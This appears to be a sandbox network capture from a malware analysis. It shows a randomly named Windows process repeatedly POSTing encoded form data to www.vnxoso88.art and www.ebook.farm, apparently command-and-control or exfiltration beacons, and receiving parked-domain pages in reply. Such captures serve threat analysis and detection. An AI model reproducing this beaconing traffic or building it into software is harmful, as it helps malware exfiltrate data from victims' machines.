Nov 12, 2024 15:33:06.570797920 CET	518	IN	Data Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNWJhNDZhYTgtZDgwMC00NjBiLTkxYWItNzAwNDcyMGFmYjFhIiwicGFnZV90aW1lIjoxNzMxNDIxOTg2LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cudm54b3NvODguYXJ0L3g

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.11.20	49773	199.59.243.227	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:33:09.092072964 CET	767	OUT	POST /x1pj/ HTTP/1.1 Host: www.vnxoso88.art Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.vnxoso88.art Referer: http://www.vnxoso88.art/x1pj/ Content-Type: application/x-www-form-urlencoded Content-Length: 220 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 6d 70 38 31 47 77 68 6f 64 34 59 43 59 55 5a 65 48 72 4d 61 43 39 47 39 7a 73 69 4b 70 59 38 42 4a 32 4a 33 4f 69 38 2f 39 63 65 38 57 41 62 61 31 53 61 75 6b 55 47 59 36 53 42 49 42 59 45 53 67 63 4f 45 53 6c 56 6a 30 43 58 77 58 5a 7a 79 7a 5a 39 64 37 70 79 66 4b 71 6a 74 6b 39 76 7a 48 2f 59 42 74 56 78 42 35 71 4c 67 66 50 5a 31 4d 4b 77 4f 65 64 63 73 79 64 4b 58 42 59 39 67 56 4d 48 62 2b 61 4e 79 6e 52 38 45 37 6a 31 47 43 50 65 47 76 78 49 45 4a 44 52 6c 6a 53 64 70 73 33 73 66 74 66 2b 36 6c 7a 35 73 44 7a 6f 66 6c 49 75 34 5a 47 61 4b 6a 4b 41 48 68 5a 76 74 5a 46 72 7a 72 68 52 57 35 52 56 6a 46 6c 48 43 66 42 59 2b 58 6a 77 3d Data Ascii: mRu=mp81Gwhod4YCYUZeHrMaC9G9zsiKpY8BJ2J3Oi8/9ce8WAba1SaukUGY6SBIBYESgcOESlVj0CXwXZzyzZ9d7pyfKqjtk9vzH/YBtVxB5qLgfPZ1MKwOedcsydKXBY9gVMHb+aNynR8E7j1GCPeGvxIEJDRljSdps3sftf+6lz5sDzoflIu4ZGaKjKAHhZvtZFrzrhRW5RVjFlHCfBY+Xjw=
Nov 12, 2024 15:33:09.227420092 CET	1289	IN	HTTP/1.1 200 OK date: Tue, 12 Nov 2024 14:33:08 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: 66966c7c-2ceb-49d2-8dc3-55559124ab99 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZK8Q16LEXMGxso9WDA24G2qwX52/yRdkhnAsLp9Kg2dOxJ9Bxi1U0gyMouSwYLFHpftGmEAk74W6q7b2hqEeRw== set-cookie: parking_session=66966c7c-2ceb-49d2-8dc3-55559124ab99; expires=Tue, 12 Nov 2024 14:48:09 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 5a 4b 38 51 31 36 4c 45 58 4d 47 78 73 6f 39 57 44 41 32 34 47 32 71 77 58 35 32 2f 79 52 64 6b 68 6e 41 73 4c 70 39 4b 67 32 64 4f 78 4a 39 42 78 69 31 55 30 67 79 4d 6f 75 53 77 59 4c 46 48 70 66 74 47 6d 45 41 6b 37 34 57 36 71 37 62 32 68 71 45 65 52 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZK8Q16LEXMGxso9WDA24G2qwX52/yRdkhnAsLp9Kg2dOxJ9Bxi1U0gyMouSwYLFHpftGmEAk74W6q7b2hqEeRw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Nov 12, 2024 15:33:09.227469921 CET	518	IN	Data Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjY5NjZjN2MtMmNlYi00OWQyLThkYzMtNTU1NTkxMjRhYjk5IiwicGFnZV90aW1lIjoxNzMxNDIxOTg5LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cudm54b3NvODguYXJ0L3g

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.11.20	49774	199.59.243.227	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:33:11.752958059 CET	2578	OUT	POST /x1pj/ HTTP/1.1 Host: www.vnxoso88.art Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.vnxoso88.art Referer: http://www.vnxoso88.art/x1pj/ Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 6d 70 38 31 47 77 68 6f 64 34 59 43 59 55 5a 65 48 72 4d 61 43 39 47 39 7a 73 69 4b 70 59 38 42 4a 32 4a 33 4f 69 38 2f 39 63 57 38 57 54 54 61 30 78 69 75 69 6b 47 59 33 79 42 4c 42 59 46 4b 67 59 69 66 53 6c 4a 56 30 42 76 77 56 36 72 79 2f 38 4a 64 79 70 79 66 47 4b 6a 67 36 4e 76 71 48 2f 49 37 74 54 52 42 35 71 4c 67 66 4e 42 31 63 49 59 4f 59 64 63 76 34 39 4b 62 4c 49 39 45 56 4d 2f 68 2b 61 49 4e 67 68 63 45 37 44 46 47 41 63 32 47 7a 68 49 61 49 44 52 48 6a 53 42 36 73 33 77 70 74 65 61 63 6c 77 4a 73 51 57 4e 6b 35 34 69 37 48 46 65 67 72 5a 38 77 33 35 2f 71 51 58 54 5a 6f 67 46 48 2f 31 77 37 62 56 58 75 50 78 4d 4a 55 6e 4a 41 67 4f 31 30 35 54 32 61 4b 43 2b 50 35 43 78 62 79 61 58 53 4c 38 51 39 36 30 72 30 37 35 5a 61 4b 69 6b 5a 38 74 56 73 61 7a 37 39 41 6b 2f 49 6d 41 6d 70 51 6e 6f 70 2b 76 62 69 32 42 55 47 39 56 62 76 2f 53 6c 43 34 49 30 47 53 46 6e 74 4c 53 34 57 34 49 75 66 4a 64 64 4f 37 6c 36 31 59 6c 7a 62 6c 6d 4d 66 4d 6c 42 37 4e 4d 32 37 76 5a 4e 56 37 75 [TRUNCATED] Data Ascii: mRu=mp81Gwhod4YCYUZeHrMaC9G9zsiKpY8BJ2J3Oi8/9cW8WTTa0xiuikGY3yBLBYFKgYifSlJV0BvwV6ry/8JdypyfGKjg6NvqH/I7tTRB5qLgfNB1cIYOYdcv49KbLI9EVM/h+aINghcE7DFGAc2GzhIaIDRHjSB6s3wpteaclwJsQWNk54i7HFegrZ8w35/qQXTZogFH/1w7bVXuPxMJUnJAgO105T2aKC+P5CxbyaXSL8Q960r075ZaKikZ8tVsaz79Ak/ImAmpQnop+vbi2BUG9Vbv/SlC4I0GSFntLS4W4IufJddO7l61YlzblmMfMlB7NM27vZNV7uFit+hbqQhfbfRnw1PFXZ7UAYC5zxICq1oNiOQkuvMUAZpjjeoXiadCk3YlzAmtoyFmXHfvW6KNJzTCYAVs3MH1M5UeKVvma3RjS8BVquAdCHNgSmfO/4eApEsYUctSz0hDKHxfPzLL5hFEDCX1+RMlr5VIvwt5zmEMet/xkYYdy26uxwjh9sek3jryjApOc5NQk2fwduYnxVwa6WigQL1+EqU0wK86MmRmqYdA2wLEd+ew42eh4fEey2dGlHgH2EIFJwTiuz9KGL1CIW5hs8sFDJ3YPAv3LnUkgH+VRfxoAdI8/EJovgOp/s0dMzxXhaHw7xwv0/w7oP7PF9HP1FosETKCGy8wQwOZcIUPio0ow3FydPSuuLkH+i/xbLg87ZqCCH98W3dIoOMlmj8gVXVKC4N5Cg14lxz3HWDPnjQ7Xr1uW8+uV7TuusimaXrk3D9aPKXMBJC6YzLflM1a0w9r8pEoWByTcGnlyFGPEK4oZG8sUNqdEUU7/+R3cQxXshS5MYH4ks1nK9bo+I4mJL/hMuXDhO8c9RFkpGSgkZRWfMblLXv0JKX3fX08MY1MrFUIqwH+6w9qSbx2r0rfe0xTgC5fapi7GySWUMIL0GWE39/6n/LWGBEH602jeM9c8qXVPtj9bkIrQHAXWx2ugkhUvIwqtf5+rR+0 [TRUNCATED]
Nov 12, 2024 15:33:11.753031015 CET	5338	OUT	Data Raw: 50 7a 78 42 33 47 76 61 32 39 35 33 66 55 4b 54 63 4e 43 78 52 47 59 66 4f 4d 6d 63 6e 59 73 72 39 73 68 6b 65 6b 65 4d 59 57 48 78 70 74 58 47 2f 54 4a 50 56 39 33 48 7a 44 7a 70 4a 58 55 4c 4f 77 52 37 34 5a 68 32 4b 42 65 51 4c 59 53 58 72 47 Data Ascii: PzxB3Gva2953fUKTcNCxRGYfOMmcnYsr9shkekeMYWHxptXG/TJPV93HzDzpJXULOwR74Zh2KBeQLYSXrGOMSFfqGQ00+WmVLI16EFGtHRqYkHD1GsXQSLPcA1qW9GxFdKGBL3bmqmgnzoXD8kolteycdnNFHlUFamfG1tKnP3Vy4MF6Muma4rUzkJyiOwFpP2j2lyEwVKSR4yfVrcsqYwp9sHVtZBf3UtS4R2KDBk2CG9L/OGT
Nov 12, 2024 15:33:11.888657093 CET	1289	IN	HTTP/1.1 200 OK date: Tue, 12 Nov 2024 14:33:10 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: d0068f2e-0420-4889-8d13-871af46e5c42 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZK8Q16LEXMGxso9WDA24G2qwX52/yRdkhnAsLp9Kg2dOxJ9Bxi1U0gyMouSwYLFHpftGmEAk74W6q7b2hqEeRw== set-cookie: parking_session=d0068f2e-0420-4889-8d13-871af46e5c42; expires=Tue, 12 Nov 2024 14:48:11 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 5a 4b 38 51 31 36 4c 45 58 4d 47 78 73 6f 39 57 44 41 32 34 47 32 71 77 58 35 32 2f 79 52 64 6b 68 6e 41 73 4c 70 39 4b 67 32 64 4f 78 4a 39 42 78 69 31 55 30 67 79 4d 6f 75 53 77 59 4c 46 48 70 66 74 47 6d 45 41 6b 37 34 57 36 71 37 62 32 68 71 45 65 52 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZK8Q16LEXMGxso9WDA24G2qwX52/yRdkhnAsLp9Kg2dOxJ9Bxi1U0gyMouSwYLFHpftGmEAk74W6q7b2hqEeRw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Nov 12, 2024 15:33:11.888705969 CET	518	IN	Data Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDAwNjhmMmUtMDQyMC00ODg5LThkMTMtODcxYWY0NmU1YzQyIiwicGFnZV90aW1lIjoxNzMxNDIxOTkxLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cudm54b3NvODguYXJ0L3g

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.11.20	49775	199.59.243.227	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:33:14.417087078 CET	475	OUT	GET /x1pj/?mRu=rrUVFAplNZMcakJZOJE4CcqToYvowPkUAgJ/Lg0h4NOzPxri4UWPxE+iyT5MFYFQlY7+f2AMywjhKYvv2dkZ2pTnN7HLjvrDE8g/sgQAyuCfG8ldMNFJeds=&UJ=7H1XM HTTP/1.1 Host: www.vnxoso88.art Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Nov 12, 2024 15:33:14.555088043 CET	1289	IN	HTTP/1.1 200 OK date: Tue, 12 Nov 2024 14:33:13 GMT content-type: text/html; charset=utf-8 content-length: 1438 x-request-id: 1e0ebd8b-6a91-4ab6-9bec-87ed8bbd5507 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hQEa0qE2gjTR9pWA89C24hLQuC454KHjMxzupAr3oT8o/9HsWmsDZl8hpOUGzC/g23P+vOvESCjEaiGsdV4IyA== set-cookie: parking_session=1e0ebd8b-6a91-4ab6-9bec-87ed8bbd5507; expires=Tue, 12 Nov 2024 14:48:14 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 68 51 45 61 30 71 45 32 67 6a 54 52 39 70 57 41 38 39 43 32 34 68 4c 51 75 43 34 35 34 4b 48 6a 4d 78 7a 75 70 41 72 33 6f 54 38 6f 2f 39 48 73 57 6d 73 44 5a 6c 38 68 70 4f 55 47 7a 43 2f 67 32 33 50 2b 76 4f 76 45 53 43 6a 45 61 69 47 73 64 56 34 49 79 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hQEa0qE2gjTR9pWA89C24hLQuC454KHjMxzupAr3oT8o/9HsWmsDZl8hpOUGzC/g23P+vOvESCjEaiGsdV4IyA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Nov 12, 2024 15:33:14.555140018 CET	838	IN	Data Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWUwZWJkOGItNmE5MS00YWI2LTliZWMtODdlZDhiYmQ1NTA3IiwicGFnZV90aW1lIjoxNzMxNDIxOTk0LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cudm54b3NvODguYXJ0L3g

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.11.20	49776	199.59.243.227	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:33:19.961199045 CET	741	OUT	POST /rzaq/ HTTP/1.1 Host: www.ebook.farm Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.ebook.farm Referer: http://www.ebook.farm/rzaq/ Content-Type: application/x-www-form-urlencoded Content-Length: 200 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 66 35 74 69 43 42 6b 54 4f 36 57 57 49 64 58 70 77 4c 52 32 4f 6c 52 70 6b 2b 6e 6b 71 35 54 4e 64 79 49 2b 33 71 6b 4c 62 45 58 49 46 44 46 61 47 72 65 4a 4c 31 38 72 50 75 4c 51 34 61 65 37 6d 2f 37 56 33 66 77 36 67 6f 6e 58 2f 50 62 4a 57 37 72 4d 73 63 67 75 33 36 34 57 4b 2f 76 4e 52 6d 67 49 57 4b 57 4f 4d 34 61 7a 71 57 68 75 39 4d 5a 6d 4a 32 4d 47 54 5a 52 39 66 45 63 37 6c 2f 44 56 69 37 44 6c 6f 4a 35 32 71 70 74 2f 77 30 37 6e 44 72 62 61 39 6c 48 47 30 67 50 37 51 75 45 34 51 4a 31 53 38 4c 4d 65 61 4d 52 30 70 48 53 61 49 55 77 6d 73 69 44 69 48 32 67 79 32 41 3d 3d Data Ascii: mRu=f5tiCBkTO6WWIdXpwLR2OlRpk+nkq5TNdyI+3qkLbEXIFDFaGreJL18rPuLQ4ae7m/7V3fw6gonX/PbJW7rMscgu364WK/vNRmgIWKWOM4azqWhu9MZmJ2MGTZR9fEc7l/DVi7DloJ52qpt/w07nDrba9lHG0gP7QuE4QJ1S8LMeaMR0pHSaIUwmsiDiH2gy2A==
Nov 12, 2024 15:33:20.096149921 CET	1289	IN	HTTP/1.1 200 OK date: Tue, 12 Nov 2024 14:33:19 GMT content-type: text/html; charset=utf-8 content-length: 1110 x-request-id: 746f3cd9-10af-4e2b-84df-f64ca43be48c cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TJRd0cBg/Wg0qph5y4x+MqnKD8tmfN0qFYyz575l6MZNQeHGH846q7SdvNvadELmWqyAnlSKFlpg8QFfptQeiw== set-cookie: parking_session=746f3cd9-10af-4e2b-84df-f64ca43be48c; expires=Tue, 12 Nov 2024 14:48:20 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 54 4a 52 64 30 63 42 67 2f 57 67 30 71 70 68 35 79 34 78 2b 4d 71 6e 4b 44 38 74 6d 66 4e 30 71 46 59 79 7a 35 37 35 6c 36 4d 5a 4e 51 65 48 47 48 38 34 36 71 37 53 64 76 4e 76 61 64 45 4c 6d 57 71 79 41 6e 6c 53 4b 46 6c 70 67 38 51 46 66 70 74 51 65 69 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TJRd0cBg/Wg0qph5y4x+MqnKD8tmfN0qFYyz575l6MZNQeHGH846q7SdvNvadELmWqyAnlSKFlpg8QFfptQeiw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Nov 12, 2024 15:33:20.096163034 CET	510	IN	Data Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzQ2ZjNjZDktMTBhZi00ZTJiLTg0ZGYtZjY0Y2E0M2JlNDhjIiwicGFnZV90aW1lIjoxNzMxNDIyMDAwLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZWJvb2suZmFybS9yemF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.11.20	49777	199.59.243.227	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:33:22.613907099 CET	761	OUT	POST /rzaq/ HTTP/1.1 Host: www.ebook.farm Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.ebook.farm Referer: http://www.ebook.farm/rzaq/ Content-Type: application/x-www-form-urlencoded Content-Length: 220 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 66 35 74 69 43 42 6b 54 4f 36 57 57 4b 35 54 70 31 73 46 32 50 46 52 6f 39 65 6e 6b 6b 70 54 57 64 79 4d 2b 33 76 41 68 48 68 48 49 4c 48 42 61 48 71 65 4a 46 56 38 72 41 4f 4c 56 32 36 65 47 6d 2f 6d 6f 33 65 4d 36 67 6f 7a 58 2f 4b 66 4a 57 4a 44 54 73 